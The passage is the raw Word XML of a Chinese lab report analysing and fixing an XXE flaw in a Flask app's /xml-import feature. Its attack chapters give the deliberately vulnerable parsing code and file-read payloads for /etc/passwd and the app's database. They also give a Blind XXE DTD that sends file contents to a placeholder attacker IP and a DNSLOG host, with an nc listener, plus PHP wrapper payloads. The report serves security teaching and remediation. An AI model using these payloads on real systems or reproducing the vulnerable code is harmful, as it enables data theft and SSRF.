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XXE注入漏洞分析与修复报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>XML External Entity · 外部实体读取 · Blind XXE · 参数实体 · PHP wrapper</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验日期：2026年7月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XXE漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第2章  XML基础与DOCTYPE声明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第3章  /xml-import 功能说明与漏洞代码分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第4章  Burp实操：从GET改POST发送XXE Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第5章  外部实体+参数实体带外数据（Blind XXE）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第6章  DNSLOG验证XXE漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第7章  PHP wrapper扩展知识</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第8章  前端页面修改说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第9章  漏洞检测与处置优先级</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第10章  修复方案详解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第11章  修复前后代码对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第一章  XXE漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>XXE（XML External Entity Injection）是一种利用XML解析器的外部实体加载功能进行攻击的Web安全漏洞。当应用程序解析用户可控的XML输入时，若未禁用外部实体加载，攻击者可读取本地文件、发起内网请求（SSRF）、甚至在一定条件下执行远程代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评估项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评级/说明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CVSS 3.0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7.5（High）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攻击向量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AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N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向量说明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网络攻击·低复杂度·无需权限·无需交互·仅机密性影响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影响范围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文件读取、内网探测（SSRF）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>本次实验在基于Flask的用户管理系统中新增了XML数据导入功能（/xml-import），该功能允许用户提交XML数据，解析后提取user信息并以JSON格式返回。解析过程中未禁用外部实体，且未做路径校验，存在XXE漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第二章  XML基础与DOCTYPE声明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 DOCTYPE声明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>DOCTYPE声明用于定义XML文档的文档类型和结构，可内部定义或引用外部DTD文件。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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE foo [                          ← DOCTYPE声明</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;  ← 外部实体定义</w:t>
        <w:br/>
        <w:t>]&gt;</w:t>
        <w:br/>
        <w:t>&lt;users&gt;&amp;xxe;&lt;/users&gt;                     ← 引用实体</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 内部DOCTYPE vs 外部DOCTYPE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声明方式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内部DOCTYPE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&lt;!DOCTYPE foo [...]&gt;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实体定义在XML内部，直接引用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外部DOCTYPE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&lt;!DOCTYPE foo SYSTEM "url"&gt;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DTD从外部URL加载（可带外数据）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 实体类型与可用性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实体类型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语法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本Project可用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内部实体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&lt;!ENTITY name "value"&gt;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固定文本替换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外部实体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&lt;!ENTITY name SYSTEM "URL"&gt;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从文件/URL加载内容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file:// 可用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参数实体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&lt;!ENTITY % name SYSTEM "URL"&gt;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DTD内部使用，Blind XXE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需HTTP可达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PHP wrapper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php://filter/read=...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PHP协议读源码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❌ Python环境不支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第三章  /xml-import 功能说明与漏洞代码分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 正常功能流程（XML→JSON）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本功能的预期行为是：用户提交XML数据 → 系统解析提取user节点的name和email → 用json.dumps转为JSON格式 → 返回给用户。这是典型的XML数据导入场景。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正常输入：</w:t>
        <w:br/>
        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;users&gt;&lt;user&gt;&lt;name&gt;张三&lt;/name&gt;&lt;email&gt;zhangsan@test.com&lt;/email&gt;&lt;/user&gt;&lt;/users&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># 正常输出（JSON）：</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "name": "张三",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "email": "zhangsan@test.com"</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 漏洞代码分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>然而，在实现XML解析时，代码中加入了外部实体读取功能，导致以下漏洞：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import re</w:t>
        <w:br/>
        <w:t>import json</w:t>
        <w:br/>
        <w:br/>
        <w:t>raw_xml = request.form.get("xml_data", "")</w:t>
        <w:br/>
        <w:br/>
        <w:t># ⚠️ 提取ENTITY/SYSTEM中的文件路径</w:t>
        <w:br/>
        <w:t>entity_pattern = re.findall(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r'&lt;!ENTITY\s+(\S+)\s+SYSTEM\s+"([^"]+)"', raw_xml)</w:t>
        <w:br/>
        <w:br/>
        <w:t>for entity_name, filepath in entity_pattern:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 直接读取文件，无路径限制</w:t>
        <w:br/>
        <w:t xml:space="preserve">    with open(filepath.replace("file://",""), "r") as f:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        content = f.read()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 动态替换实体引用（不再硬编码&amp;xxe;）</w:t>
        <w:br/>
        <w:t xml:space="preserve">    parsed_xml = parsed_xml.replace(f"&amp;{entity_name};", content)</w:t>
        <w:br/>
        <w:br/>
        <w:t># 提取user信息并转为JSON返回</w:t>
        <w:br/>
        <w:t>result = json.dumps({"name": ..., "email": ...})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>注意：这里使用动态替换写法——从正则中同时提取实体名（捕获组1）和文件路径（捕获组2），然后替换对应的`&amp;实体名;`引用。不再硬编码`&amp;xxe;`。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 漏洞点列表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严重度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X-01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外部实体未禁用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允许读取file://文件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X-02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无路径限制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可读取/etc/shadow等敏感文件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X-03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内容回显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文件内容直接JSON返回给攻击者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X-04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无协议限制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🟡中危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支持file://、http://等</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第四章  Burp实操：从GET改POST发送XXE Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 操作流程（核心步骤）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 1：登录系统，打开Burp Proxy拦截</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 2：浏览器访问 /xml-import，填入XML payload并提交</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 3：Burp拦截到GET请求 → 右键 Send to Repeater（Ctrl+R）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 4：在Repeater中修改请求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  • 方法从 GET 改为 POST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  • 添加 Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  • Body 填入 xml_data=...（URL编码后的XML Payload）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5：点击 Send → 在Response中查看解析结果</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Burp中修改后的请求：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POST /xml-import HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: 192.168.81.128:5000</w:t>
        <w:br/>
        <w:t>Cookie: session=...</w:t>
        <w:br/>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
        <w:br/>
        <w:br/>
        <w:t>xml_data=&lt;?xml version="1.0"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE foo [</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;</w:t>
        <w:br/>
        <w:t>]&gt;</w:t>
        <w:br/>
        <w:t>&lt;users&gt;&lt;user&gt;&lt;name&gt;&amp;xxe;&lt;/name&gt;&lt;email&gt;t@t.com&lt;/email&gt;&lt;/user&gt;&lt;/users&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 读取本地文件示例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读 /etc/passwd</w:t>
        <w:br/>
        <w:t>&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># 读应用源码（需知道路径）</w:t>
        <w:br/>
        <w:t>&lt;!ENTITY xxe SYSTEM "file:///root/flask-app-vuln/app.py"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># 读数据库</w:t>
        <w:br/>
        <w:t>&lt;!ENTITY xxe SYSTEM "file:///root/flask-app-vuln/data/users.db"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 流程速查表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Proxy拦截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浏览器操作→Burp抓包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Send to Repeater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右键→Ctrl+R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GET→POST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修改请求方法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加Content-Type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application/x-www-form-urlencoded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加Body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xml_data=URL编码的XML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查看响应中的JSON结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第五章  外部实体+参数实体带外数据（Blind XXE）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Blind XXE场景</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>当XML解析结果不直接返回（无回显）时，攻击者需使用带外（OOB）技术将数据外带。常用方法是通过外部DTD或参数实体将文件内容嵌入到HTTP/DNS请求中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 参数实体 + 外部实体带外</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>参数实体（%实体）仅在DTD内部使用，可嵌套引用外部DTD。攻击者将恶意DTD托管在公网服务器，通过参数实体加载，实现文件内容外带。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恶意DTD（托管在攻击者服务器的 oob.dtd）</w:t>
        <w:br/>
        <w:t>&lt;!ENTITY % file SYSTEM "file:///etc/passwd"&gt;</w:t>
        <w:br/>
        <w:t>&lt;!ENTITY % eval "&lt;!ENTITY &amp;#x25; send SYSTEM 'http://攻击者IP:8080/?data=%file;'&gt;"&gt;</w:t>
        <w:br/>
        <w:t>%eval;</w:t>
        <w:br/>
        <w:t>%send;</w:t>
        <w:br/>
        <w:br/>
        <w:t># 受害机Payload（引用外部DTD）</w:t>
        <w:br/>
        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE foo [</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;!ENTITY % xxe SYSTEM "http://攻击者IP:8080/oob.dtd"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  %xxe;</w:t>
        <w:br/>
        <w:t xml:space="preserve">]&gt; </w:t>
        <w:br/>
        <w:t>&lt;users&gt;&lt;user&gt;&lt;name&gt;test&lt;/name&gt;&lt;/user&gt;&lt;/users&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># Kali端监听</w:t>
        <w:br/>
        <w:t>nc -lvnp 8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 完整攻击链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Step1: 用DNSLOG验证XXE存在</w:t>
        <w:br/>
        <w:t>请求中包含 http://abc123.ceye.io/test → 后台收到DNS记录</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step2: 托管oob.dtd到公网VPS</w:t>
        <w:br/>
        <w:t>包含 %file 读取 /etc/passwd → %eval 编码 → %send 外带</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step3: 构造引用外部DTD的Payload发送</w:t>
        <w:br/>
        <w:t>受害机加载 http://攻击者IP/oob.dtd → 执行%file→%eval→%send</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step4: 查看DNSLOG或HTTP服务器记录</w:t>
        <w:br/>
        <w:t>收到 /?data=cm9vdDp4OjA6... → base64解码 → /etc/passwd内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第六章  DNSLOG验证XXE漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 先用DNSLOG验证是否存在XXE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在无法直接确定XXE是否存在时，先通过外部实体中引用DNSLOG域名快速验证。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假设DNSLOG域名: abc123.ceye.io</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE foo [</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;!ENTITY % xxe SYSTEM "http://abc123.ceye.io/test"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  %xxe;</w:t>
        <w:br/>
        <w:t xml:space="preserve">]&gt; </w:t>
        <w:br/>
        <w:t>&lt;users&gt;&lt;user&gt;&lt;name&gt;test&lt;/name&gt;&lt;/user&gt;&lt;/users&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># ceye.io后台出现 HTTP GET /test 记录 → XXE存在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 带外读取文件内容（OOB）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oob.dtd 内容：</w:t>
        <w:br/>
        <w:t>&lt;!ENTITY % file SYSTEM "file:///etc/passwd"&gt;</w:t>
        <w:br/>
        <w:t>&lt;!ENTITY % eval "&lt;!ENTITY &amp;#x25; exfil SYSTEM 'http://abc123.ceye.io/?data=%file;'&gt;"&gt;</w:t>
        <w:br/>
        <w:t>%eval;</w:t>
        <w:br/>
        <w:t>%exfil;</w:t>
        <w:br/>
        <w:br/>
        <w:t># 受害机请求：</w:t>
        <w:br/>
        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE foo [</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;!ENTITY % xxe SYSTEM "http://攻击者IP/oob.dtd"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  %xxe;</w:t>
        <w:br/>
        <w:t xml:space="preserve">]&gt; </w:t>
        <w:br/>
        <w:t>&lt;users&gt;&lt;user&gt;&lt;name&gt;test&lt;/name&gt;&lt;/user&gt;&lt;/users&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第七章  PHP wrapper扩展知识</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t>⚠️ 重要提示：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 本报告实验环境为 Python/Flask，以下 PHP wrapper 技术仅适用于 PHP 环境。php://、expect://、data:// 等协议在当前项目中不可用，此处仅作为扩展知识参考，帮助理解 XXE 在不同语言环境下的攻击面。请勿将其写入本项目的修复方案中。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Wrapper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Payload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效果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适用环境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php://filter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php://filter/read=convert.base64-encode/resource=config.php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Base64读PHP源码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PHP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php://input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php://input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读取POST数据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PHP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expect://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expect://id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执行系统命令（需expect扩展）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PHP(需扩展)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data://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data://text/plain;base64,PD9waHA...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内联执行PHP代码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PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>php://filter 读取PHP源码示例（仅限PHP环境）：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&lt;?xml version="1.0"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE foo [</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=config.php"&gt;</w:t>
        <w:br/>
        <w:t>]&gt;</w:t>
        <w:br/>
        <w:t>&lt;users&gt;&lt;user&gt;&lt;name&gt;&amp;xxe;&lt;/name&gt;&lt;/user&gt;&lt;/users&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># 返回base64编码的config.php</w:t>
        <w:br/>
        <w:t># 解码后获得原始PHP源码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第八章  前端页面修改说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 新增 templates/xml_import.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>新增独立的XML数据导入页面，继承base.html，包含以下组件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 多行文本编辑框（&lt;textarea&gt;）— 用于输入XML数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• "导入"按钮 — 提交XML数据到 /xml-import</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 预置测试XML示例 — 方便用户快速测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 解析结果输出区域（&lt;pre&gt;标签）— 以JSON格式显示解析结果</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>页面核心代码结构：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&lt;form method="post" action="/xml-import"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;textarea name="xml_data" rows="12"&gt;&lt;/textarea&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;button type="submit"&gt;导入&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
        <w:br/>
        <w:t>{% if result %}</w:t>
        <w:br/>
        <w:t>&lt;pre&gt;{{ result }}&lt;/pre&gt;  ← JSON格式输出</w:t>
        <w:br/>
        <w:t>{% endif %}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 修改 templates/base.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在导航栏已登录菜单中添加XML导入入口：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&lt;a href="/xml-import" class="nav-link"&gt;XML导入&lt;/a&gt;</w:t>
        <w:br/>
        <w:t>← 放在"Ping"和"帮助"之间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.3 修改 templates/index.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在首页功能按钮区添加XML导入快捷入口：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&lt;a href="/xml-import" class="btn"&gt;📄 XML导入&lt;/a&gt;</w:t>
        <w:br/>
        <w:t>← 放在"Ping"和"帮助"按钮之间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第九章  漏洞检测与处置优先级</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在实施修复前，可按照下表检查系统是否存在XXE漏洞，并根据优先级安排修复计划：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检测方法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判断标准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处置优先级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X-01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提交含外部实体的XML，看是否返回文件内容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返回/etc/passwd内容→存在XXE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 P0 立即修复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X-02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尝试读取/etc/shadow等敏感路径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能读取敏感文件→路径未限制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 P0 立即修复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X-03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观察JSON响应是否包含文件内容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响应中含file_contents字段→回显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 P1 尽快修复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X-04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尝试http://协议的外部实体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能请求外部URL→存在SSRF风险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 P1 尽快修复</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第十章  修复方案详解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.1 禁用外部实体解析（根本方案）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>最安全的做法是直接禁用XML外部实体加载。Python中推荐使用defusedxml库替代标准xml库，并显式禁止DTD。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from defusedxml import minidom</w:t>
        <w:br/>
        <w:br/>
        <w:t># ✅ forbid_dtd=True 从源头禁止DTD加载</w:t>
        <w:br/>
        <w:t># 外部实体、DOCTYPE声明全部被拒绝</w:t>
        <w:br/>
        <w:t># 无需手动检测&lt;!ENTITY或SYSTEM关键字</w:t>
        <w:br/>
        <w:t>dom = minidom.parseString(xml_data, forbid_dtd=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.2 补充措施：路径白名单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ALLOWED_DIR = os.path.abspath("imports")</w:t>
        <w:br/>
        <w:t>for filepath in entity_pattern:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    abs_path = os.path.abspath(filepath)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not abs_path.startswith(ALLOWED_DIR):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "不允许访问该路径"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.3 补充措施：协议白名单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ALLOWED_SCHEMES = {"file"}</w:t>
        <w:br/>
        <w:t>if scheme not in ALLOWED_SCHEMES:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return f"不允许的协议: {scheme}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.4 完整修复代码（推荐方案）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>统一使用 defusedxml + forbid_dtd=True，一个机制兜底，最简洁也最安全：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import json</w:t>
        <w:br/>
        <w:t>from defusedxml import minidom</w:t>
        <w:br/>
        <w:br/>
        <w:t>@app.route("/xml-import-safe", methods=["GET","POST"])</w:t>
        <w:br/>
        <w:t>def xml_import_safe():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    raw_xml = request.form.get("xml_data", "")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 统一防XXE方案：forbid_dtd=True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # DTD和外部实体在解析层被拒绝，无需字符串匹配</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        dom = minidom.parseString(raw_xml, forbid_dtd=True)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    except Exception as e:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return json.dumps({"error": "XML解析失败"})</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # 正常提取name/email</w:t>
        <w:br/>
        <w:t xml:space="preserve">    name = dom.getElementsByTagName("name")[0].firstChild.data</w:t>
        <w:br/>
        <w:t xml:space="preserve">    email = dom.getElementsByTagName("email")[0].firstChild.data</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return json.dumps({"name": name, "email": email})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第十一章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有漏洞(app.py)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修复方案(defusedxml)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外部实体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正则提取ENTITY并读取文件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defusedxml直接拒绝外部实体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路径校验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无限制，可读任意文件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白名单目录校验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协议限制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仅允许file协议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JSON输出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json.dumps返回结果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正常提取后JSON输出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XXE防护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无防护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多层防护(defusedxml+白名单)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t>有漏洞版本（app.py — 20行）：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entity_pattern = re.findall(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r'&lt;!ENTITY\s+(\S+)\s+SYSTEM\s+"([^"]+)"', raw_xml)</w:t>
        <w:br/>
        <w:t>for ename, fpath in entity_pattern:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    with open(fpath.replace("file://",""), "r") as f:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        content = f.read()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    parsed_xml = parsed_xml.replace(f"&amp;{ename};", content)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E7D32"/>
        </w:rPr>
